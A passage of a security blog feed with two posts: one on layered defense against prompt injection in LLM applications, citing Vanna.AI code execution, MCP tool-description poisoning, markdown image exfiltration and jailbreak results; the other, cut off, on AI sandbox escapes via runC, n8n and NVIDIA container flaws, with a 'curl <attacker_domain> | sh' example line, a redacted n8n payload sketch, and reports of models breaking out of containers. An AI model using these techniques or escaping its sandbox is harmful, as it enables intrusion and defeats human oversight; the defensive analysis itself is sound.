data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/166e12ed-ca2f-4821-aee8-835ce61d4c18_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:7933135,&quot;alt&quot;:&quot;LLM defense in depth architecture: layered probabilistic and deterministic controls across input validation, least privilege, credential isolation, sandboxing, prompt injection blast radius containment.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/180844717?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdfdbfc55-a369-4184-b219-657f0d757c01_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="LLM defense in depth architecture: layered probabilistic and deterministic controls across input validation, least privilege, credential isolation, sandboxing, prompt injection blast radius containment." title="LLM defense in depth architecture: layered probabilistic and deterministic controls across input validation, least privilege, credential isolation, sandboxing, prompt injection blast radius containment." srcset="https://substackcdn.com/image/fetch/$s_!2989!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F166e12ed-ca2f-4821-aee8-835ce61d4c18_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!2989!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F166e12ed-ca2f-4821-aee8-835ce61d4c18_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!2989!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F166e12ed-ca2f-4821-aee8-835ce61d4c18_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!2989!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F166e12ed-ca2f-4821-aee8-835ce61d4c18_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> LLM defense in depth is a layered architecture that contains the blast radius of prompt injection when probabilistic filters fail. OWASP ranks instruction-data conflation LLM01:2025 and states foolproof prevention may not exist. The strategy: assume breach, treat the model as untrusted, and design every layer outside it so a landed injection can&#8217;t reach credentials, tools, or anything worth stealing.</p><blockquote><p>Subscribe to ToxSec. The next prompt injection chain ships every Sunday, before vendors notice.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Why LLM Defense in Depth Isn&#8217;t a Buzzword Anymore</h2><p>LLM defense in depth is the operating doctrine for AI systems because the model itself can&#8217;t enforce its own rules. OWASP ranks prompt injection <a href="https://genai.owasp.org/llmrisk/llm01-prompt-injection/">LLM01:2025</a>, top vulnerability for the third year, and explicitly states foolproof prevention may not exist given how transformers process input. That&#8217;s the standards body telling everyone the playbook has a hole in it.</p><p>The 2025-2026 track record is brutal. NeuralTrust chained Echo Chamber with Crescendo and broke Grok-4 within 48 hours of release, no explicit malicious prompt anywhere in the chain. Anthropic threw <a href="https://www.toxsec.com/p/dan-prompts-for-guardrail-bypass">Constitutional Classifiers at the problem</a>, one of the hardest defenses shipped to date, and reduced automated jailbreak success from 86% to 4.4%. Then they ran a two-month, $55,000 HackerOne bounty against the system. Researchers still found a universal jailbreak. One, but one is enough.</p><p>So the question isn&#8217;t &#8220;how do we prevent prompt injection.&#8221; That question has no answer. The question is <strong>what can a successful injection actually reach when it lands.</strong> That&#8217;s the part of the threat model we can engineer.</p><p>The rest of this piece maps the architecture that contains the blast.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share&quot;,&quot;text&quot;:&quot;Share ToxSec - AI and Cybersecurity &quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share"><span>Share ToxSec - AI and Cybersecurity </span></a></p></blockquote><h2>Why LLM Trust Boundaries Don&#8217;t Hold</h2><p>Traditional software has hard walls between instructions and data. SQL has parameterized queries. Operating systems have kernel mode and user mode. The CPU enforces privilege rings in silicon. LLMs ship with none of that.</p><p>A system prompt arrives as tokens. The user message arrives as tokens. A poisoned document pulled from a RAG store arrives as tokens. All three hit the same attention layer with the same weight. Researchers call this <a href="https://www.toxsec.com/p/ai-and-cybersecurity">instruction-data conflation</a>, and it&#8217;s the structural reason every other LLM risk hangs off it.</p><p>Wrap user input in XML tags. Add delimiters. Stack reminders. The model treats every line as soft guidance and the next token decides whether to follow. Encoding attacks bolt on languages and base64 to sail past every classifier, because the model decodes the payload just fine while the filter, trained on English, sees noise.</p><p>Then there&#8217;s the multimodal expansion. Adversarial pixels and audio waveforms carry instructions that text-only monitoring will never see, and <a href="https://www.toxsec.com/p/multimodal-prompt-injection-attacks-images-audio">vision-language models can&#8217;t tell content from command</a>. Every new tool, plugin, and data source connected to the model is <strong>a new injection point</strong>.</p><p><strong>The wall was never a wall. It was a suggestion written in the same language as the attack.</strong></p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/llm-defense-in-depth-assume-breach?utm_source=substack&utm_medium=email&utm_content=share&action=share&quot;,&quot;text&quot;:&quot;Share&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/llm-defense-in-depth-assume-breach?utm_source=substack&utm_medium=email&utm_content=share&action=share"><span>Share</span></a></p></blockquote><h2>Probabilistic vs Deterministic LLM Defenses</h2><p>Defense in depth for LLMs splits into two categories doing different jobs. <strong>Probabilistic defenses</strong> reduce the likelihood of a successful attack: input filters, safety training, injection classifiers. They&#8217;re speed bumps. They slow opportunistic attackers and catch the lazy payloads. They will always have bypasses, because every probabilistic defense can be overcome with enough attempts and enough prompt variation.</p><p><strong>Deterministic defenses</strong> provide hard boundaries regardless of what the model decides to do: privilege separation, output blocking, tool sandboxing, human-in-the-loop confirmations. Those are the blast doors. They don&#8217;t care whether the injection landed. They care whether the resulting action is allowed at the application layer.</p><p>The OWASP Top 10 for LLM Applications 2025 puts the implication in plain English: given the stochastic way models work, foolproof prevention may not exist. So treat probabilistic and deterministic as different tools for different jobs. <strong>Speed bumps without blast doors are theater. Blast doors without speed bumps are noisy.</strong> Stack both, scoped to the threat each one actually addresses.</p><p>This is the same assume-breach mindset baked into zero trust architecture for the last decade. Microsoft formalized it. CISA published it. Now we apply it to systems where the perimeter was never real in the first place.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/llm-defense-in-depth-assume-breach/comments&quot;,&quot;text&quot;:&quot;Leave a comment&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/llm-defense-in-depth-assume-breach/comments"><span>Leave a comment</span></a></p></blockquote><h2>How LLM Injection Cascades Without Blast Radius Scoping</h2><p>When injection lands on a model with broad tool access, damage scales with the reach the model already had. Worst case in the catalog right now: Vanna.AI, <a href="https://jfrog.com/blog/prompt-injection-attack-code-execution-in-vanna-ai-cve-2024-5565/">CVE-2024-5565</a>, CVSS 8.1. The library&#8217;s <code>ask()</code> function generated Plotly visualization code and shoved it straight into Python&#8217;s <code>exec()</code>. JFrog showed a prompt injection in the question field rewrote the visualization code into arbitrary commands. The host obediently ran it. RCE through a graphing library, because the trust chain between model output and code execution had no boundary.</p><p>The MCP ecosystem replicated that mistake at scale. A poisoned tool description in the metadata field reads as trusted instructions, and we&#8217;ve walked the chain where <a href="https://www.toxsec.com/p/lets-poison-the-mcp">the model fabricates credentials the tool never returned</a>. The attacker doesn&#8217;t need to compromise the model. They poison the metadata it loads before the first user message hits.</p><p>Then the supply chain joins the party. On March 24, 2026, TeamPCP shipped two backdoored LiteLLM versions to PyPI containing a credential stealer targeting <a href="https://www.trendmicro.com/en_us/research/26/c/inside-litellm-supply-chain-compromise.html">SSH keys, cloud credentials, and Kubernetes configs</a> across thousands of CI/CD pipelines. The malware had a bug that crashed boxes with a runaway fork bomb. Without that mistake, the credential exfiltration would still be quiet.</p><p><strong>Every one of those incidents is what happens when injection lands in a system that didn&#8217;t bother to scope what the landing zone could touch.</strong></p><blockquote><p>Working AI security? Restack this so the next architecture review starts at containment, not filter tuning.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share&quot;,&quot;text&quot;:&quot;Share ToxSec - AI and Cybersecurity &quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share"><span>Share ToxSec - AI and Cybersecurity </span></a></p></blockquote><h2>What Actually Layers Around an Untrusted Model</h2><p><strong>Five layers. None of them stop injection. All of them shrink the radius.</strong></p><p><strong>Layer one: provenance tagging.</strong> Every piece of content entering the context gets a trust label at the application layer. System prompt: trusted. User input: untrusted. RAG result: untrusted. Tool output: untrusted. The model still sees everything; the wrapper around it uses the tags to decide whether a given output is allowed to trigger a tool call. The structural tracking does the work, regardless of how capable the model gets.</p><p><strong>Layer two: least privilege for every integration.</strong> This is the single most impactful control. If the customer service bot has write access to production, injection doesn&#8217;t need to be clever; it just needs to land. Scope every API token, every database connection, every MCP server like you&#8217;re handing a service account to a contractor who lies about everything. Because behaviorally, that&#8217;s the situation.</p><p><strong>Layer three: output validation and deterministic blocking.</strong> Validate the output stream before anything executes. Block markdown image rendering for exfiltration. Strip embedded URLs with query parameters. Microsoft Copilot&#8217;s defense kills markdown image exfil at this layer. The injection lands, the model generates the payload, the output filter drops it before render.</p><p><strong>Layer four: HITL, with eyes open.</strong> Any action that spends money, modifies data, or sends communications gets human confirmation. Worth knowing: HITL is itself attackable. The <a href="https://www.toxsec.com/p/human-in-the-loop">Lies-in-the-Loop technique</a> forges the dialog the human sees, so the click approves something different from what the agent runs. Treat the HITL prompt as untrusted output too.</p><p><strong>Layer five: application-layer monitoring.</strong> Prompt injection doesn&#8217;t trip a firewall. The attack lives in tool calls and output patterns, so detection has to live there. Baseline normal model behavior. Alert on deviations. The LiteLLM compromise got caught because the malware had a bug; without that, monitoring was the only thing standing between the credential stealer and a quiet six-month dwell.</p><blockquote><div class="community-chat" data-attrs="{&quot;url&quot;:&quot;https://open.substack.com/pub/toxsec/chat?utm_source=chat_embed&quot;,&quot;subdomain&quot;:&quot;toxsec&quot;,&quot;pub&quot;:{&quot;id&quot;:4991138,&quot;name&quot;:&quot;ToxSec - AI and Cybersecurity &quot;,&quot;author_name&quot;:&quot;ToxSec&quot;,&quot;author_photo_url&quot;:&quot;https://substackcdn.com/image/fetch/$s_!J0tu!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbcc231af-becb-46d7-a503-8314a6b5e870_3840x3840.png&quot;}}" data-component-name="CommunityChatRenderPlaceholder"></div></blockquote><h2>How to Contain LLM Blast Radius</h2><p>Assume breach means designing for the moment after the wall falls. From the attacker side, we already know it falls. So the only question is what the landing zone looks like.</p><p><strong>Credential isolation.</strong> The model never holds credentials in its context. No API keys in system prompts. No database passwords in retrieved documents. No tokens in tool descriptions. Authentication happens at the tool execution boundary, outside the model&#8217;s reach. We follow an injected instruction to exfiltrate credentials. We find nothing to steal. The credentials were never in the context to begin with. <strong>Single architectural decision that kills an entire class of attack outcomes.</strong></p><p><strong>Tool execution sandboxing.</strong> Every tool runs in an isolated environment with its own permission boundary. Vanna&#8217;s RCE worked because <code>exec()</code> ran in the host process. Drop that same chain into a container with filesystem restrictions, no network access, and no process creation, and the worst-case becomes &#8220;weird Plotly chart&#8221; instead of &#8220;shell on the box.&#8221;</p><p><strong>Blast radius partitioning.</strong> Segment the AI system so compromise of one component doesn&#8217;t cascade. Customer-facing chatbot, internal analytics agent, and code review agent each get their own credentials, their own tool scope, their own monitoring profile. Microsegmentation for AI, same principle that limited lateral movement in network security for a decade.</p><p><strong>Session isolation.</strong> A successful injection in one user&#8217;s session shouldn&#8217;t reach other sessions. Context windows ephemeral. Tool access session-scoped. If the model has persistent memory, sanitize what gets stored and treat stored context as untrusted on retrieval. Persistent memory becomes a persistence mechanism for attackers if what goes in isn&#8217;t validated.</p><p><strong>Red team for landing, not for entry.</strong> Standard red team question is &#8220;can we inject.&#8221; Settled. The honest test is &#8220;we successfully injected, now what&#8217;s the worst outcome?&#8221; If the answer is &#8220;weird response, no real-world action,&#8221; ship it. If the answer is &#8220;full database access with the service account,&#8221; the architecture needs work before deployment, because we&#8217;re going to find that path before the patch ships.</p><blockquote><p>That&#8217;s the defense map. Subscribe to ToxSec, we keep filling in the wounds, one Sunday at a time.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>What is defense in depth for LLM applications?</h3><p>LLM defense in depth is a layered security architecture that stacks probabilistic controls (input filters, safety training, classifiers) with deterministic controls (privilege separation, sandboxing, output blocking, HITL) around an untrusted language model. The doctrine is straight zero trust: assume the model can be compromised by prompt injection because OWASP LLM01:2025 says foolproof prevention may not exist, then design every surrounding layer so a landed injection can&#8217;t reach credentials, tools, or sensitive operations. The architecture around the model does the work, regardless of how capable the model gets.</p><h3>How do you contain prompt injection blast radius?</h3><p>Blast radius containment for prompt injection comes from four architectural decisions, none of which require the model to behave correctly. Credential isolation keeps API keys and tokens outside the context window so injection has nothing to exfiltrate. Tool execution sandboxing means a compromised model can only act inside a permission boundary it can&#8217;t escape. Microsegmentation between agents prevents one compromised component from cascading into others. Session isolation stops a single user&#8217;s injection from affecting other users. The goal is engineering the landing zone so the worst-case after successful injection is a weird response with no real-world consequence.</p><h3>Can prompt injection in LLMs be prevented?</h3><p>Not reliably, and OWASP says so directly. The 2025 Top 10 for LLM Applications notes that given the stochastic way transformer models work, foolproof prevention may not exist. Every probabilistic defense, including input filters, safety training, and injection classifiers, can be bypassed with enough attempts. Anthropic&#8217;s Constitutional Classifiers reduced automated jailbreak success from 86% to 4.4%, then a two-month public bounty found a universal bypass. Defense in depth replaces the unreachable prevention goal with a containment goal: assume injection will succeed, design so it can&#8217;t reach anything worth stealing, and red team against the post-injection blast radius.</p><h3>What does assume breach mean for AI security architecture?</h3><p>Assume breach for AI systems means designing every control around the LLM under the explicit assumption that the model can and will be compromised by prompt injection, multimodal payloads, or poisoned context. It&#8217;s the same zero trust doctrine Microsoft and CISA formalized for enterprise networks, applied to systems where the perimeter was never real to begin with. The practical implication is that probabilistic defenses get treated as speed bumps rather than walls, and the architecture invests heavily in deterministic controls: privilege separation, credential isolation, output blocking, sandboxing, and HITL confirmations. The wall falls. Design what&#8217;s behind it.</p><div class="callout-block" data-callout="true"><p>ToxSec is run by a USMC veteran and Security Engineer with hands-on experience at AWS and the NSA. CISSP certified, M.S. in Cybersecurity Engineering. He covers security vulnerabilities, attack chains, and the tools defenders actually need to understand.</p></div>]]></content:encoded></item><item><title><![CDATA[AI Sandbox Escape: Why Docker Can’t Hold Frontier Models]]></title><description><![CDATA[Frontier models escape Docker containers for $1, n8n sandboxes ship RCE, and ROME mined crypto during training with nobody asking.]]></description><link>https://www.toxsec.com/p/ai-sandbox-escape</link><guid isPermaLink="false">https://www.toxsec.com/p/ai-sandbox-escape</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Thu, 28 May 2026 13:30:45 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!sN0C!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faa494644-7e5e-42d0-965e-d06ecf7521cb_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!sN0C!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faa494644-7e5e-42d0-965e-d06ecf7521cb_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!sN0C!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faa494644-7e5e-42d0-965e-d06ecf7521cb_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!sN0C!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faa494644-7e5e-42d0-965e-d06ecf7521cb_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!sN0C!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faa494644-7e5e-42d0-965e-d06ecf7521cb_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!sN0C!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faa494644-7e5e-42d0-965e-d06ecf7521cb_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!sN0C!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faa494644-7e5e-42d0-965e-d06ecf7521cb_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/aa494644-7e5e-42d0-965e-d06ecf7521cb_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:6989661,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193834945?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9caf0467-b974-483b-8f7f-4a103d1ddf20_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!sN0C!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faa494644-7e5e-42d0-965e-d06ecf7521cb_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!sN0C!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faa494644-7e5e-42d0-965e-d06ecf7521cb_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!sN0C!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faa494644-7e5e-42d0-965e-d06ecf7521cb_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!sN0C!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Faa494644-7e5e-42d0-965e-d06ecf7521cb_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> Frontier models escape Docker sandboxes through known CVEs for the cost of an API call. Production sandboxes leak through workflow injection (n8n CVE-2026-25049) and OCI hook misconfigurations (NVIDIAScape CVE-2025-23266). And ROME, an Alibaba RL agent, broke out on its own to mine crypto. </p><p>The sandbox is the last line.</p><blockquote><p>New to ToxSec? Subscribe. We map a fresh AI attack chain like this one every Sunday, and you don&#8217;t want to find out about the next sandbox escape from your incident channel.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Why the Sandbox Is the Last Line</h2><p>A sandbox is a throwaway jail cell for code. AWS Lambda boots tens of trillions of them. We spin one up, run untrusted instructions inside it, grab the output, and burn the whole thing down. Decades old idea. Unix had <code>chroot</code> back in the dial-up era. Browsers have been jailing JavaScript tabs since right around when Pop-Up Stopper was a feature.</p><p>What changed is who writes the code. When a human types a script, you read it before you run it. When an LLM writes a script at runtime based on a prompt nobody pre-screened, the review step vanishes. The code lives for milliseconds before it executes. Could be a clean data viz. Could be <code>os.system('curl &lt;attacker_domain&gt; | sh')</code> because a prompt injection rewired the model&#8217;s intent four hops upstream.</p><ul><li><p>Two boundaries do the work. <strong>Filesystem isolation</strong> keeps the agent&#8217;s hands off SSH keys, <code>~/.bashrc</code>, and your AWS creds. </p></li><li><p><strong>Network isolation</strong> keeps the agent from phoning home to a C2 or smuggling tokens out through a Markdown image tag. </p></li></ul><p>You need both. </p><ul><li><p>A strong network with weak filesystem still lets a compromised agent loot the local box. </p></li><li><p>A strong filesystem with weak network still lets it leak everything it reads.</p></li></ul><p>Scale makes the problem urgent. AI apps spawn thousands of concurrent code execution sessions, each running a unique program nobody has ever seen. One bad execution can&#8217;t bleed into another, and none of them touch prod. That&#8217;s multi-tenant isolation. AWS solved it for Lambda a decade ago. The agent stack is rediscovering it the hard way, often while <a href="https://www.toxsec.com/p/vibe-coding-security-attack-chain">shipping AI code straight to production</a>.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share&quot;,&quot;text&quot;:&quot;Share ToxSec - AI and Cybersecurity &quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/?utm_source=substack&amp;utm_medium=email&amp;utm_content=share&amp;action=share"><span>Share ToxSec - AI and Cybersecurity </span></a></p></blockquote><h2>Docker&#8217;s Shared Kernel Breaks Under Pressure</h2><p>Standard containers share the host kernel. That&#8217;s the deal, and that&#8217;s the bug. Docker gets its own PID namespace, its own filesystem mount, its own network stack. The kernel is one big shared party. CVE-2024-1086, a Linux kernel use-after-free in the netfilter subsystem patched in January 2024, is the proof: same bug, every container on the box.</p><p>That CVE got picked up by RansomHub and Akira for post-compromise privilege escalation. <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-1086">CISA confirmed active ransomware exploitation in late October 2025</a>. The bug is older than some readers. It still pops boxes.</p><p>November 2025 dropped three more presents under the runC tree. CVE-2025-31133, CVE-2025-52565, and CVE-2025-52881. All three let attackers bypass Docker&#8217;s <code>maskedPaths</code> through symlink races and write into procfs gadgets like <code>/proc/sysrq-trigger</code> or <code>/proc/sys/kernel/core_pattern</code>. Own <code>core_pattern</code> and the kernel runs your binary on the next coredump. With full host privileges. Game over.</p><p>The userland side is just as soft. February 2026 brought CVE-2026-25049, a sandbox escape inside n8n&#8217;s JavaScript expression engine. CVSS 9.4. The chain stacked three flaws: a template literal bypass, <code>prepareStackTrace</code> exploitation, and an arrow function oversight in the AST sanitizer. <a href="https://www.pillar.security/blog/n8n-sandbox-escape-critical-vulnerabilities-in-n8n-exposes-hundreds-of-thousands-of-enterprise-ai-systems-to-complete-takeover">Pillar Security disclosed it</a>, n8n shipped a fix in 48 hours, and Pillar bypassed the fix the next day.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;c08f0347-5197-4db4-abeb-41d58986e75f&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">// CVE-2026-25049 expression sandbox escape, shape only.
// Working payload redacted. This sketch will not execute.
{{ ({}).constructor.constructor("/* &lt;bypass logic&gt; */")() }}
// Goal: reach the Node.js global object via AST blind spots
// Result: arbitrary command execution as the n8n process user
</code></pre></div><p>We don&#8217;t get a patch chapter here. Hundreds of thousands of n8n deployments were sitting on AI API keys, OAuth tokens, and Kubernetes cluster credentials when the bug dropped. The same sandbox failure pattern hit NVIDIA&#8217;s container toolkit in July 2025. <a href="https://www.wiz.io/blog/nvidia-ai-vulnerability-cve-2025-23266-nvidiascape">CVE-2025-23266, dubbed NVIDIAScape by Wiz</a>, needed three lines of Dockerfile and an OCI hook misconfiguration to drop root on the host. Wiz estimated 37% of cloud environments were exposed, including the majors running AI workloads on shared GPU infrastructure. Same model, same week, same target list.</p><blockquote><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/p/ai-sandbox-escape?utm_source=substack&utm_medium=email&utm_content=share&action=share&quot;,&quot;text&quot;:&quot;Share&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/p/ai-sandbox-escape?utm_source=substack&utm_medium=email&utm_content=share&action=share"><span>Share</span></a></p></blockquote><h2>Frontier Models Escape Docker for a Dollar</h2><p>March 2026. Researchers at Oxford and the UK AI Security Institute dropped <a href="https://www.aisi.gov.uk/blog/can-ai-agents-escape-their-sandboxes-a-benchmark-for-safely-measuring-container-breakout-capabilities">SandboxEscapeBench</a>, the first systematic benchmark measuring whether frontier models can break out of container environments on their own. 18 scenarios spanning orchestration, runtime, and kernel layers. Inspect framework. Nested sandbox design so any successful escape stays caged in an outer 